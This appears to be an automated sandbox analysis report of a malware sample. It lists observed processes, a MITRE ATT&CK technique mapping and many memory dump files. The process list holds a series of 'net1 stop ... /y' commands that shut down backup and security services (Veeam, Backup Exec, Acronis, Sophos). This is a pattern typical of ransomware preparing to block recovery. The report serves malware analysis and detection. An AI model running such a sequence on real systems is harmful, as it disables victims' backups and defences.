C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
1⤵
PID:5336

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
1⤵
PID:5388

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop veeam /y
1⤵
PID:5424

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
1⤵
PID:5472

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
1⤵
PID:5520

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
1⤵
PID:5496

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
1⤵
PID:5596

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
1⤵
PID:5640

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
1⤵
PID:5440

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sophos /y
1⤵
PID:4344

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
1⤵
PID:6012

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
1⤵
PID:5964

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
1⤵
PID:800

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:4168

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:5096

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:4960

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k swprv
1⤵
PID:4608

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
1⤵
PID:5452

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
1⤵
PID:5256

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VSNAPVSS /y
1⤵
PID:5192

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
1⤵
PID:4296

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

File Deletion

T1107

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/64-269-0x00000188FDA00000-0x00000188FDA02000-memory.dmp

Filesize
8KB

Download
memory/64-647-0x00000188FDA08000-0x00000188FDA09000-memory.dmp

Filesize
4KB

Download
memory/64-273-0x00000188FDA03000-0x00000188FDA05000-memory.dmp

Filesize
8KB

Download
memory/64-550-0x00000188FDA06000-0x00000188FDA08000-memory.dmp

Filesize
8KB

Download
memory/360-170-0x000002C2F9B40000-0x000002C2F9B42000-memory.dmp

Filesize
8KB

Download
memory/360-174-0x000002C2F9B40000-0x000002C2F9B42000-memory.dmp

Filesize
8KB

Download
memory/360-169-0x000002C2F9B40000-0x000002C2F9B42000-memory.dmp

Filesize
8KB

Download
memory/360-395-0x000002C2FBA86000-0x000002C2FBA88000-memory.dmp

Filesize
8KB

Download
memory/360-219-0x000002C2FBA83000-0x000002C2FBA85000-memory.dmp

Filesize
8KB

Download
memory/360-216-0x000002C2FBA80000-0x000002C2FBA82000-memory.dmp

Filesize
8KB

Download
memory/360-167-0x000002C2F9B40000-0x000002C2F9B42000-memory.dmp

Filesize
8KB

Download
memory/360-617-0x000002C2FBA88000-0x000002C2FBA89000-memory.dmp

Filesize
4KB

Download
memory/948-184-0x000001BADBDC0000-0x000001BADBDC2000-memory.dmp

Filesize
8KB

Download
memory/948-540-0x000001BADD9C8000-0x000001BADD9C9000-memory.dmp

Filesize
4KB

Download
memory/948-253-0x000001BADD9C3000-0x000001BADD9C5000-memory.dmp

Filesize
8KB

Download
memory/948-322-0x000001BADD9C6000-0x000001BADD9C8000-memory.dmp

Filesize
8KB

Download
memory/948-238-0x000001BADD9C0000-0x000001BADD9C2000-memory.dmp

Filesize
8KB

Download
memory/948-176-0x000001BADBDC0000-0x000001BADBDC2000-memory.dmp

Filesize
8KB

Download
memory/948-180-0x000001BADBDC0000-0x000001BADBDC2000-memory.dmp

Filesize
8KB

Download
memory/948-178-0x000001BADBDC0000-0x000001BADBDC2000-memory.dmp

Filesize
8KB

Download
memory/1444-191-0x000002366E990000-0x000002366E992000-memory.dmp

Filesize
8KB

Download
memory/1444-183-0x000002366E990000-0x000002366E992000-memory.dmp

Filesize
8KB

Download
memory/1444-451-0x00000236704A6000-0x00000236704A8000-memory.dmp

Filesize
8KB

Download
memory/1444-185-0x000002366E990000-0x000002366E992000-memory.dmp

Filesize
8KB

Download
memory/1444-188-0x000002366E990000-0x000002366E992000-memory.dmp

Filesize
8KB

Download
memory/1444-276-0x00000236704A0000-0x00000236704A2000-memory.dmp

Filesize
8KB

Download
memory/1444-280-0x00000236704A3000-0x00000236704A5000-memory.dmp

Filesize
8KB

Download
memory/1444-623-0x00000236704A8000-0x00000236704A9000-memory.dmp

Filesize
4KB

Download
memory/1736-190-0x000002A4894C0000-0x000002A4894C2000-memory.dmp

Filesize
8KB

Download
memory/1736-206-0x000002A4A31E3000-0x000002A4A31E5000-memory.dmp

Filesize
8KB

Download
memory/1736-205-0x000002A4A31E0000-0x000002A4A31E2000-memory.dmp

Filesize
8KB

Download
memory/1736-159-0x000002A4894C0000-0x000002A4894C2000-memory.dmp

Filesize
8KB

Download
memory/1736-165-0x000002A4894C0000-0x000002A4894C2000-memory.dmp

Filesize
8KB

Download
memory/1736-158-0x000002A4894C0000-0x000002A4894C2000-memory.dmp

Filesize
8KB

Download
memory/1736-193-0x000002A4894C0000-0x000002A4894C2000-memory.dmp

Filesize
8KB

Download
memory/1736-408-0x000002A4A31E8000-0x000002A4A31E9000-memory.dmp

Filesize
4KB

Download
memory/1736-247-0x000002A4A31E6000-0x000002A4A31E8000-memory.dmp

Filesize
8KB

Download
memory/1736-161-0x000002A4894C0000-0x000002A4894C2000-memory.dmp

Filesize
8KB

Download
memory/2136-284-0x00000206B4B93000-0x00000206B4B95000-memory.dmp

Filesize
8KB

Download
memory/2136-455-0x00000206B4B96000-0x00000206B4B98000-memory.dmp

Filesize
8KB

Download
memory/2136-192-0x000002069C4B0000-0x000002069C4B2000-memory.dmp

Filesize
8KB

Download
memory/2136-195-0x000002069C4B0000-0x000002069C4B2000-memory.dmp

Filesize
8KB

Download
memory/2136-189-0x000002069C4B0000-0x000002069C4B2000-memory.dmp

Filesize
8KB

Download
memory/2136-619-0x00000206B4B98000-0x00000206B4B99000-memory.dmp

Filesize
4KB

Download
memory/2136-202-0x00000206B4B90000-0x00000206B4B92000-memory.dmp

Filesize
8KB

Download
memory/2156-230-0x000001E0187D3000-0x000001E0187D5000-memory.dmp

Filesize
8KB

Download
memory/2156-502-0x000001E0187D6000-0x000001E0187D8000-memory.dmp

Filesize
8KB

Download
memory/2156-620-0x000001E0187D8000-0x000001E0187D9000-memory.dmp

Filesize
4KB

Download
memory/2156-227-0x000001E0187D0000-0x000001E0187D2000-memory.dmp

Filesize
8KB

Download
memory/2528-222-0x0000027A9D030000-0x0000027A9D032000-memory.dmp

Filesize
8KB

Download
memory/2528-175-0x0000027A9CED0000-0x0000027A9CED2000-memory.dmp

Filesize
8KB

Download
memory/2528-618-0x0000027A9D038000-0x0000027A9D039000-memory.dmp

Filesize
4KB

Download
memory/2528-233-0x0000027A9D033000-0x0000027A9D035000-memory.dmp

Filesize
8KB

Download
memory/2528-402-0x0000027A9D036000-0x0000027A9D038000-memory.dmp

Filesize
8KB

Download
memory/2528-177-0x0000027A9CED0000-0x0000027A9CED2000-memory.dmp

Filesize
8KB

Download
memory/2528-171-0x0000027A9CED0000-0x0000027A9CED2000-memory.dmp

Filesize
8KB

Download
memory/2528-172-0x0000027A9CED0000-0x0000027A9CED2000-memory.dmp

Filesize
8KB

Download
memory/2856-115-0x0000000000A30000-0x0000000000A31000-memory.dmp

Filesize
4KB

Download
memory/2856-126-0x000000001B6C0000-0x000000001B6C2000-memory.dmp

Filesize
8KB

Download
memory/2896-157-0x000001BCF83D0000-0x000001BCF83D2000-memory.dmp

Filesize
8KB

Download
memory/2896-160-0x000001BCF83D0000-0x000001BCF83D2000-memory.dmp

Filesize
8KB

Download
memory/2896-214-0x000001BCFA3C3000-0x000001BCFA3C5000-memory.dmp

Filesize
8KB

Download
memory/2896-360-0x000001BCFA3C6000-0x000001BCFA3C8000-memory.dmp

Filesize
8KB

Download
memory/2896-166-0x000001BCF83D0000-0x000001BCF83D2000-memory.dmp

Filesize
8KB

Download
memory/2896-199-0x000001BCFA3C0000-0x000001BCFA3C2000-memory.dmp

Filesize
8KB

Download
memory/2896-162-0x000001BCF83D0000-0x000001BCF83D2000-memory.dmp

Filesize
8KB

Download
memory/2896-616-0x000001BCFA3C8000-0x000001BCFA3C9000-memory.dmp

Filesize
4KB

Download
memory/3284-545-0x0000025DF1056000-0x0000025DF1058000-memory.dmp

Filesize
8KB

Download
memory/3284-622-0x0000025DF1058000-0x0000025DF1059000-memory.dmp

Filesize
4KB

Download
memory/3284-262-0x0000025DF1053000-0x0000025DF1055000-memory.dmp

Filesize
8KB

Download
memory/3284-259-0x0000025DF1050000-0x0000025DF1052000-memory.dmp

Filesize
8KB

Download
memory/3680-212-0x000002CC5C773000-0x000002CC5C775000-memory.dmp

Filesize
8KB

Download
memory/3680-497-0x000002CC5C776000-0x000002CC5C778000-memory.dmp

Filesize
8KB

Download
memory/3680-209-0x000002CC5C770000-0x000002CC5C772000-memory.dmp

Filesize
8KB

Download
memory/3680-621-0x000002CC5C778000-0x000002CC5C779000-memory.dmp

Filesize
4KB

Download
memory/3760-648-0x000001E2FEDF8000-0x000001E2FEDF9000-memory.dmp

Filesize
4KB

Download
memory/3760-243-0x000001E2FEDF0000-0x000001E2FEDF2000-memory.dmp

Filesize
8KB

Download
memory/3760-250-0x000001E2FEDF3000-0x000001E2FEDF5000-memory.dmp

Filesize
8KB

Download
memory/3760-506-0x000001E2FEDF6000-0x000001E2FEDF8000-memory.dmp

Filesize
8KB

Download
memory/4024-120-0x000001E5CD4F0000-0x000001E5CD4F2000-memory.dmp

Filesize
8KB

Download
memory/4024-127-0x000001E5E74B0000-0x000001E5E74B2000-memory.dmp

Filesize
8KB

Download
memory/4024-123-0x000001E5CD4F0000-0x000001E5CD4F2000-memory.dmp

Filesize
8KB

Download
memory/4024-122-0x000001E5CEFA0000-0x000001E5CEFA1000-memory.dmp

Filesize
4KB

Download
memory/4024-121-0x000001E5CD4F0000-0x000001E5CD4F2000-memory.dmp

Filesize
8KB

Download
memory/4024-124-0x000001E5CD4F0000-0x000001E5CD4F2000-memory.dmp

Filesize
8KB

Download
memory/4024-119-0x000001E5CD4F0000-0x000001E5CD4F2000-memory.dmp

Filesize
8KB

Download
memory/4024-163-0x000001E5E74B6000-0x000001E5E74B8000-memory.dmp

Filesize
8KB

Download
memory/4024-125-0x000001E5E7640000-0x000001E5E7641000-memory.dmp

Filesize
4KB

Download
memory/4024-151-0x000001E5CD4F0000-0x000001E5CD4F2000-memory.dmp

Filesize
8KB

Download
memory/4024-129-0x000001E5CD4F0000-0x000001E5CD4F2000-memory.dmp

Filesize
8KB

Download
memory/4024-118-0x000001E5CD4F0000-0x000001E5CD4F2000-memory.dmp

Filesize
8KB

Download
memory/4024-128-0x000001E5E74B3000-0x000001E5E74B5000-memory.dmp

Filesize
8KB

Download